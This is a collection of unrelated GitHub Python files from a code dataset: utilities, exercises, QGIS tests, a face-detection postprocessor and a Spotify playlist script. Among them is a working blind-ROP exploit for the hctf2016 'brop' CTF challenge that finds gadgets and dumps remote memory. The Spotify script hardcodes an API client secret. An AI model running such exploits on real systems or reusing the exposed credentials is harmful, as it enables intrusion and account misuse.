foundJobIndicator = False\n foundQrIndicator = False\n jobBasicAttribs = objectName.attrib\n for subItem in objectName:\n parameterType = subItem.tag\n lowerDict = dict((k.lower(), v.lower()) for k, v in subItem.attrib.items())\n if parameterType == \"VARIABLE\":\n varName = subItem.attrib.get('NAME')\n varValue = str(subItem.attrib.get('VALUE'))\n lowerVarValue = varValue.lower()\n if schemaName in lowerVarValue and varName in \"%%DB-STP_SCHEM\":\n foundJobIndicator = True\n translatedFieldName = getVariableType(varName)\n listRow = \"---->> \" + translatedFieldName + \" = \" + varValue\n tempList.append(listRow)\n qRList = []\n for qResource in objectName.iter('QUANTITATIVE'):\n qRName = str(qResource.get('NAME').lower())\n qRList.append(qRName)\n if resourceName in qRList:\n foundQrIndicator = True\n break\n else:\n listRow = \"---->> QR : \" + resourceName + \" Not Found\\n\" + \"-------->> QR List : \" + str(qRList)\n tempList.append(listRow)\n break\n else:\n continue\n else:\n continue\n if ((foundJobIndicator) and (foundQrIndicator == False)):\n return tempList\n else:\n return False\n\nyes = set(['YES', 'Y', 'YE'])\nschemaName = \"\"\nresourceName = \"\"\nkeepSearchingIndicator = True\nuseExcludeFlag = False\nwhile keepSearchingIndicator:\n schemaNames = \"\"\n while schemaNames == \"\":\n schemaNames = input('Enter the name of the Oracle Schemna : ')\n schemasList = schemaNames.split(',')\n resourceName = input('Enter Resource Name :')\n resourceName = resourceName.upper()\n for schema in schemasList:\n finder(schema, resourceName)\n keepSearching = input('do you want to search another string ? (y/yes)')\n keepSearching = keepSearching.upper()\n if keepSearching not in yes:\n keepSearchingIndicator = False\n\ninput('Press any key to continue.... 
')\n\n\n\n\n","repo_name":"MikiManor/Python-ControlMUtils","sub_path":"Reporters/QRReporter-DB-Jobs.py","file_name":"QRReporter-DB-Jobs.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43563483841","text":"def main():\r\n caesarSubst()\r\n\r\ndef trimWhiteSpace(s):\r\n s = s.replace(\" \",\"\")\r\n return s\r\n\r\n\r\ndef caesarSubst():\r\n key = eval(input(\"Input an integer from 0 to 25: \"))\r\n s = trimWhiteSpace(input(\"What message do you want to encrypt?: \"))\r\n d = []\r\n e = []\r\n letters = (\"abcdefghijklmnopqrstuvwxyz\")\r\n for i in s:\r\n d.append(ord(i)+ key)\r\n for i in d:\r\n i =i + (i - 97)//26\r\n e.append(chr(i))\r\n print(\"\".join(e))\r\n\r\nmain()\r\n \r\n\r\n \r\n","repo_name":"gzsalam7/python-practice","sub_path":"salamTest4.py","file_name":"salamTest4.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41144506777","text":"import random\r\n\r\nplay_game = 'y'\r\n\r\nwhile play_game == 'y':\r\n answer = random.randint(1, 100)\r\n try_number = input(\"Guess a number between 1 to 100 : \")\r\n try_number = int(try_number)\r\n counter = 1\r\n\r\n while try_number != answer:\r\n if try_number > answer:\r\n print(\"Your number is too large.\")\r\n elif try_number < answer:\r\n print(\"Your number is too small.\")\r\n try_number = int(input(\"Guess a number between 1 to 100 : \"))\r\n counter += 1\r\n print(f\"You got it. You tried {counter} times !!\")\r\n play_game = input(\"Continue ? Please enter y or n : \")\r\n\r\nprint(\"\\nThank you for playing with us !\")","repo_name":"Ketan-Kulkarni2791/Guessing-Random-Numbers","sub_path":"Updated_main.py","file_name":"Updated_main.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"4192391128","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 12 05:09:29 2022\r\n\r\n@author: Shohruh Tukhtashev\r\n\"\"\"\r\n\r\na=input('a=')\r\nsana=0\r\nfor i in range(len(a)):\r\n if a[i]==' ':\r\n sana+=1\r\nif sana!=1:\r\n for i in range(len(a)):\r\n if a[i]==' ':\r\n for j in range(i+1,len(a)):\r\n if a[j]!=' ':\r\n print(a[j],end='')\r\n else:\r\n break\r\n break","repo_name":"Shohruhtukhtashev/Problem-solving","sub_path":"String/string39.py","file_name":"string39.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30550482554","text":"\"\"\"QGIS Unit tests for QgsCodeEditorColorScheme\n\n.. 
note:: This program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 2 of the License, or\n(at your option) any later version.\n\"\"\"\n__author__ = 'Nyall Dawson'\n__date__ = '03/10/2020'\n__copyright__ = 'Copyright 2020, The QGIS Project'\n\nfrom qgis.PyQt.QtCore import QCoreApplication\nfrom qgis.PyQt.QtGui import QColor\nfrom qgis.core import QgsSettings\nfrom qgis.gui import (\n QgsCodeEditorColorScheme,\n QgsCodeEditorColorSchemeRegistry,\n QgsGui,\n)\nimport unittest\nfrom qgis.testing import start_app, QgisTestCase\n\nstart_app()\n\n\nclass TestQgsCodeEditorColorScheme(QgisTestCase):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Run before all tests\"\"\"\n super().setUpClass()\n QCoreApplication.setOrganizationName(\"QGIS_Test\")\n QCoreApplication.setOrganizationDomain(\"QGIS_TestPyQgsCodeEditorColorScheme.com\")\n QCoreApplication.setApplicationName(\"QGIS_TestPyQgsCodeEditorColorScheme\")\n QgsSettings().clear()\n start_app()\n\n def testScheme(self):\n scheme = QgsCodeEditorColorScheme('my id', 'my name')\n self.assertEqual(scheme.id(), 'my id')\n self.assertEqual(scheme.name(), 'my name')\n\n scheme.setColor(QgsCodeEditorColorScheme.ColorRole.Keyword, QColor(255, 0, 0))\n scheme.setColor(QgsCodeEditorColorScheme.ColorRole.Method, QColor(0, 255, 0))\n self.assertEqual(scheme.color(QgsCodeEditorColorScheme.ColorRole.Keyword).name(), '#ff0000')\n self.assertEqual(scheme.color(QgsCodeEditorColorScheme.ColorRole.Method).name(), '#00ff00')\n\n def testSchemeRegistry(self):\n default_reg = QgsGui.codeEditorColorSchemeRegistry()\n self.assertGreaterEqual(len(default_reg.schemes()), 3)\n\n registry = QgsCodeEditorColorSchemeRegistry()\n self.assertCountEqual(registry.schemes(), ['default', 'solarized', 'solarized_dark'])\n self.assertEqual(registry.scheme('solarized').name(), 'Solarized (Light)')\n self.assertEqual(registry.scheme('solarized_dark').name(), 'Solarized (Dark)')\n\n # duplicate name\n scheme = QgsCodeEditorColorScheme('solarized', 'my name')\n self.assertFalse(registry.addColorScheme(scheme))\n\n # unique name\n scheme = QgsCodeEditorColorScheme('xxxx', 'my name')\n self.assertTrue(registry.addColorScheme(scheme))\n self.assertCountEqual(registry.schemes(), ['default', 'solarized', 'solarized_dark', 'xxxx'])\n self.assertEqual(registry.scheme('xxxx').name(), 'my name')\n\n self.assertFalse(registry.removeColorScheme('yyyy'))\n self.assertCountEqual(registry.schemes(), ['default', 'solarized', 'solarized_dark', 'xxxx'])\n self.assertTrue(registry.removeColorScheme('xxxx'))\n self.assertCountEqual(registry.schemes(), ['default', 'solarized', 'solarized_dark'])\n\n # should return default registry if matching one doesn't exist\n self.assertEqual(registry.scheme('xxxx').name(), 'Default')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"qgis/QGIS","sub_path":"tests/src/python/test_qgscodeeditorcolorscheme.py","file_name":"test_qgscodeeditorcolorscheme.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","stars":8946,"dataset":"github-code","pt":"7"} +{"seq_id":"70425485985","text":"# -*- coding: utf-8 -*-\n\"\"\"\njsonFile to graph\n\"\"\"\n\nimport json\nimport networkx as nx\n\ndef jsonFile2graph(file):\n data = None\n with open(file) as json_file:\n data = json.load(json_file)\n G = nx.MultiDiGraph()\n for n in data['nodes']:\n G.add_node(n, type=data['nodeTypes'][str(n)])\n for e in 
data['edges']:\n s = e['source']\n t = e['target']\n n = e['name']\n G.add_edge(s, t, type=n)\n return G","repo_name":"Antolin1/TCRMG-GNN","sub_path":"python/json2graph.py","file_name":"json2graph.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72844831262","text":"from __future__ import print_function\nimport os\nimport argparse\nimport torch\nimport numpy as np\nfrom layers.functions.prior_box import PriorBox\nfrom utils.nms_wrapper import nms\nfrom utils.timer import Timer\n\n\ncfg = {\n 'name': 'FaceBoxes', \n 'min_sizes': [[32, 64, 128], [256], [512]], \n 'steps': [32, 64, 128], 'variance': [0.1, 0.2], \n 'clip': False, \n 'loc_weight': 2.0, \n 'gpu_train': True\n}\n\ndef decode(loc, priors, variances):\n \"\"\"Decode locations from predictions using priors to undo\n the encoding we did for offset regression at train time.\n Args:\n loc (tensor): location predictions for loc layers,\n Shape: [num_priors,4]\n priors (tensor): Prior boxes in center-offset form.\n Shape: [num_priors,4].\n variances: (list[float]) Variances of priorboxes\n Return:\n decoded bounding box predictions\n \"\"\"\n\n boxes = torch.cat((\n priors[:, :2] + loc[:, :2] * variances[0] * priors[:, 2:],\n priors[:, 2:] * torch.exp(loc[:, 2:] * variances[1])), 1)\n boxes[:, :2] -= boxes[:, 2:] / 2\n boxes[:, 2:] += boxes[:, :2]\n return boxes\n\n\nparser = argparse.ArgumentParser(description='FaceBoxes')\n\nparser.add_argument('--save_folder', default='FDDB_Evaluation/', type=str, help='Dir to save results')\nparser.add_argument('--prep_info', default='prep/')\nparser.add_argument('--prep_folder', default='benchmark_tools/result/dumpOutput_device0/')\n\nparser.add_argument('--cpu', action=\"store_true\", default=False, help='Use cpu inference')\n\nparser.add_argument('--dataset', default='FDDB', type=str, choices=['AFW', 'PASCAL', 'FDDB'], help='dataset')\nparser.add_argument('--confidence_threshold', default=0.05, type=float, help='confidence_threshold')\nparser.add_argument('--top_k', default=5000, type=int, help='top_k')\nparser.add_argument('--nms_threshold', default=0.3, type=float, help='nms_threshold')\nparser.add_argument('--keep_top_k', default=750, type=int, help='keep_top_k')\nparser.add_argument('-s', '--show_image', action=\"store_true\", default=False, help='show detection results')\nparser.add_argument('--vis_thres', default=0.5, type=float, help='visualization_threshold')\nargs = parser.parse_args()\n\n\n\nif __name__ == '__main__':\n \n _t = {'forward_pass': Timer(), 'misc': Timer()}\n print('1')\n # save file\n if not os.path.exists(args.save_folder):\n os.makedirs(args.save_folder)\n fw = open(os.path.join(args.save_folder, 'FDDB_dets.txt'), 'w')\n print('2')\n num_images=0\n # prep_info\n prepinfo_list = os.path.join(args.prep_info, 'FDDB.txt')\n with open(prepinfo_list, 'r') as fr:\n \n \n # testing begin\n for prep_info in fr:\n \n _t['misc'].tic()\n num_images= num_images+1\n print(prep_info)\n #input info\n img_name,im_height,im_width,resize=prep_info.split(' ')\n \n im_height = np.float32(im_height)\n im_width = np.float32(im_width)\n resize = np.float32(resize)\n \n scale = torch.Tensor([im_width, im_height, im_width, im_height])\n \n #input loc conf\n img_bin_1 = os.path.join(args.prep_folder,img_name+'_0.bin')\n img_bin_2 = os.path.join(args.prep_folder,img_name+'_1.bin')\n buf_1 = np.fromfile(img_bin_1, dtype=\"float32\")\n buf_2 = np.fromfile(img_bin_2, dtype=\"float32\") \n conf = 
np.reshape(buf_2, [1, 21824, 2])\n loc = np.reshape(buf_1, [1, 21824, 4])\n \n loc = torch.Tensor(loc)\n conf = torch.Tensor(conf)\n\n priorbox = PriorBox(cfg, image_size=(1024, 1024))\n priors = priorbox.forward()\n prior_data = priors.data\n boxes = decode(loc.data.squeeze(0), prior_data, [0.1, 0.2])\n \n boxes = boxes * scale / resize\n boxes = boxes.cpu().numpy()\n scores = conf.squeeze(0).data.cpu().numpy()[:, 1]\n \n # ignore low scores\n inds = np.where(scores > args.confidence_threshold)[0]\n boxes = boxes[inds]\n scores = scores[inds]\n \n # keep top-K before NMS\n order = scores.argsort()[::-1][:args.top_k]\n boxes = boxes[order]\n scores = scores[order]\n \n # do NMS\n dets = np.hstack((boxes, scores[:, np.newaxis])).astype(np.float32, copy=False)\n #keep = py_cpu_nms(dets, args.nms_threshold)\n keep = nms(dets, args.nms_threshold,force_cpu=True)\n dets = dets[keep, :]\n \n # keep top-K faster NMS\n dets = dets[:args.keep_top_k, :]\n \n _t['misc'].toc()\n # save dets\n if args.dataset == \"FDDB\":\n fw.write('{:s}\\n'.format(img_name))\n fw.write('{:.1f}\\n'.format(dets.shape[0]))\n for k in range(dets.shape[0]):\n xmin = dets[k, 0]\n ymin = dets[k, 1]\n xmax = dets[k, 2]\n ymax = dets[k, 3]\n score = dets[k, 4]\n w = xmax - xmin + 1\n h = ymax - ymin + 1\n fw.write('{:.3f} {:.3f} {:.3f} {:.3f} {:.3f}\\n'.format(xmin, ymin, w, h, score))\n else:\n for k in range(dets.shape[0]):\n xmin = dets[k, 0]\n ymin = dets[k, 1]\n xmax = dets[k, 2]\n ymax = dets[k, 3]\n ymin += 0.2 * (ymax - ymin + 1)\n score = dets[k, 4]\n fw.write('{:s} {:.3f} {:.1f} {:.1f} {:.1f} {:.1f}\\n'.format(img_name, score, xmin, ymin, xmax, ymax))\n print('im_detect: {:d} misc: {:.4f}s'.format( num_images, _t['misc'].average_time))\n \n\n fw.close()\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"ACL_PyTorch/contrib/cv/face/FaceBoxes/faceboxes_pth_postprocess.py","file_name":"faceboxes_pth_postprocess.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"72423778783","text":"def missingNumber(nums):\n # To Apply Binary Search, we have to sort the given array first\n nums.sort()\n \n # What are we searching for?\n # We know that numbers are in the range 0 to n which means, at each index, number should be equal to index\n # e.g. at 0, number should be 0 and so on...\n # So for each mid position, we just need to check if at mid, the number is at its correct place or not.\n # Because the array is sorted, if mid is at correct place, all elements before it are also at correct place\n \n start,end = 0, len(nums) - 1\n missing = -1\n \n while start <= end:\n mid = start + (end - start) // 2\n \n # If the element at mid is not at its correct place\n # Either that index is the missing number or \n # There is some missing number before that is causing this wrong placement\n # Hence, even after this condition is true, we won't stop searching.\n # We will search on left of mid if mid element is not at correct place\n # Else we will search on right of mid if mis is already at right place\n if nums[mid] != mid: \n missing = mid\n end = mid - 1\n else: start = mid + 1\n \n # If at the end, missing number is still -1, that means it is n which is the length of the array\n # This is for Cases such as [0,1]\n return len(nums) if missing == -1 else missing\n\n\nnums = [9,6,4,2,3,5,7,0,1]\n\nprint(\"Missing Number is -> \", missingNumber(nums))","repo_name":"itsarvindhere/binary-search","sub_path":"005. 
Missing Number/BinarySearchSolution.py","file_name":"BinarySearchSolution.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"39825629458","text":"from spotipy import Spotify, util\nimport json\nimport db_interface\nfrom datetime import datetime, timezone\nfrom re import sub\nfrom spotipy.exceptions import SpotifyException\n\n\ndef spotify_obj():\n client_id = 'e1e98182af4a4ca881f61231e4b0787b'\n client_secret = '72d28146bcc3430fae89d259acf03d23'\n redirect_uri = 'http://localhost:8080'\n scope = 'playlist-modify-public'\n username = 'bdfgc5lgagjyvwig35m3uy834'\n token = util.prompt_for_user_token(username, scope, client_id, client_secret, redirect_uri)\n sp = Spotify(auth=token)\n return sp\n\n\ndef grab_all_songs(artist_name):\n \"\"\"\n I thought to grab the artist ID then search through the artist_albums endpoint, but that doesn't return\n popularity.\n :param artist_name:\n \"\"\"\n spotify_api = spotify_obj()\n page = spotify_api.search(q=f'artist:\"{artist_name}\"', type=\"track\", limit=50)['tracks']\n data = []\n while True:\n date_time = str(datetime.now(timezone.utc).astimezone())\n data.append([json.dumps(page), date_time])\n try:\n page = spotify_api.next(page)['tracks']\n except (TypeError, SpotifyException):\n '''\n If the next() function fails, it returns TypeError, it means it can't find the 'next' key.\n SpotifyException happens when there's a next page, but it returns a 404.\n '''\n break\n create_new_table_in_db(artist_name)\n db_interface.create_api_data(sub('[- ]', '_', artist_name), data)\n\n\ndef find_playlist_id_if_exists(playlist_name):\n playlist_page = spotify_obj().current_user_playlists(limit=50)\n playlist_ids = [each_item['id']\n for each_item in playlist_page['items']\n if each_item['name'] == playlist_name]\n return playlist_ids\n\n\ndef delete_playlists(playlist_ids):\n \"\"\"\n No way to delete playlists with the Spotify API outright. Best way to remove them from the profile is to simply\n unfollow them.\n :param playlist_ids: A list of playlist IDs\n :return: Returns the current user playlists if you would like to confirm.\n \"\"\"\n spotify_api = spotify_obj()\n for each_playlist_id in playlist_ids:\n spotify_api.user_playlist_unfollow('bdfgc5lgagjyvwig35m3uy834', each_playlist_id)\n return spotify_api.current_user_playlists(limit=50)\n\n\ndef add_tracks_to_playlist(artist_name):\n uris_list = [item[0]\n for item in db_interface.select_data_from_table(sub('[- ]', '_', artist_name), 'URI', 'Top_Songs')]\n while True:\n playlist_id = find_playlist_id_if_exists(f'Top 50 {artist_name} Songs Right Now')\n if len(playlist_id) == 0:\n try:\n spotify_obj().user_playlist_create('bdfgc5lgagjyvwig35m3uy834',\n f\"Top 50 {artist_name} Songs Right Now\",\n public=True,\n description=\n f\"The most popular songs by {artist_name}! \"\n f\"Updated Daily.\")\n except SpotifyException:\n # Sometimes the fx returns a server error here, want the program to try again.\n pass\n continue\n break\n spotify_obj().user_playlist_replace_tracks('bdfgc5lgagjyvwig35m3uy834',\n playlist_id=playlist_id[0], tracks=uris_list)\n\n\n# SQL Interactions\ndef create_new_table_in_db(artist_name):\n \"\"\"\n This simply creates a new table in the db for our artist. 
Ensures there are no conflicts.\n :param artist_name:\n :return:\n \"\"\"\n db_interface.delete_table(sub('[- ]', '_', artist_name)) # Replacing table if it exists\n db_interface.create_table(sub('[- ]', '_', artist_name))\n","repo_name":"lafftar/spotify_playlist_creator","sub_path":"spc/spotify_api_interface.py","file_name":"spotify_api_interface.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"759520578","text":"# -*- coding:utf-8 -*-\nimport random\n\nl = []\nfor i in range(0, 10):\n height = random.randint(80, 100)\n l.append(height)\n\nprint(l)\n\n\ndef InsertSort(a):\n for i in range(1, len(l)):\n for j in range(i, 0, -1):\n if a[j - 1] > a[j]:\n a[j - 1], a[j] = a[j], a[j - 1]\n else:\n break\n\n\n# 内层循环 对应遍历所有的有序数据\n# 从后往前扫描\n# 从当前无序数据的前一位开始\n# 遍历到下表为0 包括0\n\n\nInsertSort(l)\nprint(l)\n","repo_name":"ljrdemail/AID1810","sub_path":"算法/插入排序.py","file_name":"插入排序.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5059453296","text":"from pwn import *\n\n#context.log_level = 'debug'\ncontext.arch='amd64'\n\n\nhang_addr = 0x400724\n\n\nppppppr_addr = 0x4007ba\n\ngadget2 = ppppppr_addr - 0x1a\ngadget1 = ppppppr_addr\n'''\ngadget1:\n\tmov rdx,r13\n\tmov rsi,r14\n\tmov edi,r15d\n\tcall QWORD PTR [r12+rbx*8]\n\tadd rbx,0x1\n\tcmp rbx,rbp\n\tjne 4007a0 <__libc_csu_init+0x40>\n\tadd rsp,0x8\ngadget2:\n\tpop rbx\n\tpop rbp\n\tpop r12\n\tpop r13\n\tpop r14\n\tpop r15\n\tret \n'''\nputs_addr = 0x601018\n\n#this func from Icemakr. thx.\ndef com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):\n payload = p64(part1) # part1 entry pop_rbx_pop_rbp_pop_r12_pop_r13_pop_r14_pop_r15_ret\n payload += p64(0x0) # rbx be 0x0\n payload += p64(0x1) # rbp be 0x1\n payload += p64(jmp2) # r12 jump to\n payload += p64(arg3) # r13 -> rdx arg3\n payload += p64(arg2) # r14 -> rsi arg2\n payload += p64(arg1) # r15 -> edi arg1\n payload += p64(part2) # part2 entry will call [rbx + r12 + 0x8]\n payload += 'A' * 56 # junk\n return payload\n\ndef log_in_file(addr):\n\t#f = open('log.txt','a')\n\t#f = open('gadgets.txt','a')\n\tf = open('res.txt','a')\n\tf.write(\"ok addr : 0x%x\\n\" % addr)\n\tf.close()\n\ndef log_in_file1(addr,flag,data):\n\t#f = open('log.txt','a')\n\t#f = open('gadgets.txt','a')\n\tf = open('res.txt','a')\n\tif(flag):\n\t\tf.write(\"ok addr : 0x%x\\t%s\\n\" % (addr,data))\n\telse:\n\t\tf.write(\"wront addr : 0x%x\\t%s\\n\" % (addr,data))\n\tf.close()\n\n\ndef get_hang_addr(addr):\n\tp = remote('127.0.0.1',10001)\n\tpayload = \"A\" * 72 + p64(addr)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\ttry:\n\t\t#for junk\n\t\tp.recvline()\n\t\tif(p.recv() != None):\n\t\t\tlog.info(\"alive ! at 0x%x\" % addr)\n\t\t\tlog_in_file(addr)\n\t\t\tp.close()\n\texcept EOFError as e: \n\t\tp.close()\n\t\tlog.info(\"dead connection! at 0x%x\" % addr)\n\ndef get_gadgets_addr(addr):\n\tp = remote('127.0.0.1',10001)\n\tpayload = \"A\" * 72 + p64(addr) + p64(1)+p64(2)+p64(3)+p64(4)+p64(5)+p64(6)+p64(hang_addr)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\ttry:\n\t\t#for junk\n\t\tp.recvline()\n\t\tif(p.recv() != None):\n\t\t\tlog.info(\"find gadgets at 0x%x\" % addr)\n\t\t\tlog_in_file(addr)\n\t\t\tp.close()\n\texcept EOFError as e: \n\t\tp.close()\n\t\tlog.info(\"dead connection! 
at 0x%x\" % addr)\n\n\ndef find_write_func(addr):\n\tp = remote('127.0.0.1',10001)\n\t#guess is there write() ?\n\t#payload = \"A\"*72 + com_gadget(gadget1,gadget2,addr,arg1=0,arg2=0x400000,arg3=4) +p64(hang_addr)\n\t#guess is there puts() ?\n\tpayload = \"A\"*72 + com_gadget(gadget1,gadget2,addr,arg1=0x400000)+p64(hang_addr)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\ttry:\n\t\t#for junk\n\t\tp.recvline()\n\t\tdata = p.recv()\n\t\tif(data != None):\n\t\t\tlog.info(\"find gadgets at 0x%x\" % addr)\n\t\t\tlog.info(\"\\tget data : %s\" % data)\n\t\t\t#raw_input('###stop')\n\t\t\tif(data[0:7] != \"WelCome\"):\n\t\t\t\tlog_in_file1(addr,True,data)\n\t\t\telse:\n\t\t\t\tlog_in_file1(addr,False,data)\n\t\t\tp.close()\n\texcept EOFError as e: \n\t\tp.close()\n\t\tlog.info(\"dead connection! at 0x%x\" % addr)\n\n\ndef write2file(data):\n\tf = open('leak.bin','a')\n\tf.write(data)\n\tf.close()\n\ndef leak(addr):\n\tp = remote('127.0.0.1',10001)\n\t#p = process('./main')\n\t#raw_input('#')\n\tpayload = \"A\"*72 + com_gadget(gadget1,gadget2,puts_addr,arg1=addr)+p64(hang_addr)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\ttry:\n\t\tp.recvline()\n\t\tdata = p.recvline().strip()\n\t\tif(data != None):\n\t\t\ttry:\n\t\t\t\tdata = data[0:data.index(\"WelCome\")]\n\t\t\texcept ValueError as e:\n\t\t\t\tdata = data\n\t\t\t#if leak data is 0x00\n\t\t\tif data == \"\":\n\t\t\t\tdata = \"\\x00\"\n\t\t\t#if leak data is end with 0x0a\n\t\t\telif(data[len(data)- 1] == '\\n' and data[len(data)- 2] == '\\n'):\n\t\t\t\tdata = data.strip()\n\t\t\t\tdata = data+\"\\x0a\"\n\t\t\tlog.info(\"leaking: 0x%x --> %s\" % (addr,(data or '').encode('hex')))\n\t\t\tp.close()\n\t\t\treturn data\n\texcept EOFError as e: \n\t\tp.close()\n\t\tlog.info(\"dead connection! 
at 0x%x\" % addr)\n\t\treturn None\n\t\n\ndef leak1(p,addr):\n\tpayload = \"A\"*72 + com_gadget(gadget1,gadget2,puts_addr,arg1=addr)+p64(hang_addr)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\tp.recvline() #junk line\n\tdata = p.recvline()\n\tlog.info(\"leaking: 0x%x --> %s\" % (addr,(data or '').encode('hex')))\n\treturn data\n\ndef main():\n\t'''\n\t#p = remote('127.0.0.1',10001)\n\tp = process('./main')\n\traw_input('$')\n\tpayload = \"A\"*72 + com_gadget(gadget1,gadget2,0x601028,arg1=0,arg2=0x601060,arg3=8)\n\tp.recvuntil('WelCome my friend,Do you know password?')\n\tp.sendline(payload)\n\tp.interactive()\n\t'''\n\t'''\n\taddr_base = 0x400730\n\tfor i in xrange(0xffffff):\n\t\taddr = addr_base + i\n\t\tget_hang_addr(addr)\n\t'''\n\t'''\n\taddr_base = 0x400740\n\tfor i in xrange(0xffffff):\n\t\taddr = addr_base + i\n\t\tget_gadgets_addr(addr)\n\t'''\n\t'''\n\taddr_base = 0x600000-1\n\tfor i in xrange(0xffffff):\n\t\taddr = addr_base + i\n\t\tfind_write_func(addr)\n\t'''\n\n\t#dump bin\n\taddr = 0x600000\n\twhile True:\n\t\tdata = leak(addr)\n\t\taddr += len(data)\n\t\twrite2file(data)\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"threezerobravoteam/PwnableLog","sub_path":"CTFWP/hctf2016-brop/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14272883588","text":"import arrapi, os\n\nfrom setuptools import setup, find_packages\n\nwith open(\"README.rst\", \"r\") as f:\n long_descr = f.read()\n\n__version__ = None\nif os.path.exists(\"VERSION\"):\n with open(\"VERSION\") as handle:\n for line in handle.readlines():\n line = line.strip()\n if len(line) > 0:\n __version__ = line\n break\n\nsetup(\n name=arrapi.__package_name__,\n version=__version__,\n description=arrapi.__description__,\n long_description=long_descr,\n url=arrapi.__url__,\n author=arrapi.__author__,\n author_email=arrapi.__email__,\n license=arrapi.__license__,\n packages=find_packages(),\n python_requires=\">=3.6\",\n keywords=[\"arrapi\", \"sonarr\", \"radarr\", \"arr\", \"wrapper\", \"api\"],\n install_requires=[\n \"requests\"\n ],\n project_urls={\n \"Documentation\": \"https://arrapi.metamanager.wiki\",\n \"Funding\": \"https://github.com/sponsors/meisnate12\",\n \"Source\": \"https://github.com/meisnate12/ArrAPI\",\n \"Issues\": \"https://github.com/meisnate12/ArrAPI/issues\",\n },\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Topic :: Software Development :: Libraries\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n ]\n)\n","repo_name":"meisnate12/ArrAPI","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"7"} +{"seq_id":"2488453524","text":"#create the stack with the list.\nclass Stack:\n def __init__(self):\n self.list = []\n\n def push(self, item):\n self.list.append(item)\n return\n\n def pop(self):\n self.list.pop(self.list[len(self.list)-1])\n return\n\n def isempty(self):\n if len(self.list) == 0:\n return True\n else:\n return False\n \n def size(self):\n return len(self.list)\n\n def top(self):\n if self.isempty():\n return \"Stack is empty\"\n return 
self.list[len(self.list)-1]\n\n def __str__(self):\n return \"Elements of Stack are:\" + str(self.list)\n\n \nL = Stack()\nL.push(\"a\")\nL.push(\"2\")\nL.push(\"b\")\nL.push(\"3\")\nprint(L)\n\nL.pop()\nL.pop()\nL.pop()\nL.pop()\n\nprint(L.list)\n\nS = L.isempty()\nprint(S)\n\nS = L.size()\nprint(S)\n\nS = L.top()\nprint(S)\n\n#C++ has call by value and call by refernce: https://ideone.com/6O0wEO\n#Python is call by object reference: https://ideone.com/49lKmm\n\n\n","repo_name":"shraysidubey/pythonScripts","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30507084784","text":"__author__ = 'Arnaud Morvan'\n__date__ = 'May 2015'\n__copyright__ = '(C) 2015, Arnaud Morvan'\n\nimport os\n\nfrom qgis.PyQt.QtGui import QIcon\nfrom qgis.PyQt.QtCore import QVariant\n\nfrom qgis.core import (Qgis,\n QgsApplication,\n QgsSettings,\n QgsGeometry,\n QgsFeature,\n QgsField,\n QgsFeatureRequest,\n QgsFeatureSink,\n QgsWkbTypes,\n QgsFields,\n QgsProcessing,\n QgsProcessingException,\n QgsProcessingFeatureSource,\n QgsProcessingParameterFeatureSource,\n QgsProcessingParameterEnum,\n QgsProcessingParameterFeatureSink,\n QgsProcessingOutputNumber,\n QgsProcessingParameterBoolean)\nfrom processing.algs.qgis.QgisAlgorithm import QgisAlgorithm\n\nsettings_method_key = \"/qgis/digitizing/validate_geometries\"\npluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]\n\n\nclass CheckValidity(QgisAlgorithm):\n INPUT_LAYER = 'INPUT_LAYER'\n METHOD = 'METHOD'\n VALID_OUTPUT = 'VALID_OUTPUT'\n VALID_COUNT = 'VALID_COUNT'\n INVALID_OUTPUT = 'INVALID_OUTPUT'\n INVALID_COUNT = 'INVALID_COUNT'\n 